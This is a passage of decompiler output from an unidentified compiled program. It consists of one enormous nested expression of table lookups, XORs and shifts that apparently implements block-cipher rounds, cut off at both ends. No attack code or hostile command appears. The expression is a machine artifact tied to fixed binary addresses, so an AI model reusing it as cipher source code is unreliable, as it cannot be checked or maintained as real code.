0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x414dd0 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x414dd0 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x18) * 4) ^  *(0x414dd0 + (_t224 & 0x000000ff) * 4) ^ _t242[2]) >> 0x18) * 4) ^  *(0x414dd0 + (_t158 & 0x000000ff) * 4) ^ _t242[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t229 >> 0x18) * 4) ^  *(0x414dd0 + (_t229 & 0x000000ff) * 4) ^ _t242[4];
							_t243 =  &(_t242[5]);
							 *(_t248 + 0x18) = _t243;
							_t164 = _t243;
							_t234 =  *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  *(0x414dd0 + (_t219 & 0x000000ff) * 4) ^  *_t242) >> 0x18) * 4) ^  *(0x414dd0 + (_t153 & 0x000000ff) * 4) ^ _t242[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (( *(0x4145d0 + (( *(0x4145d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + (( *(0x4145d0 + ((_t95 ^  *_t146) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4149d0 + ((_t95 ^  *_t146) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + ((_t95 ^  *_t146) >> 0x18) * 4) ^  *(0x414dd0 + (_t100 & 0x000000ff) * 4) ^  *(_t146 + 4)) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x4141d0 + (_t219 >> 0x18) * 4) ^  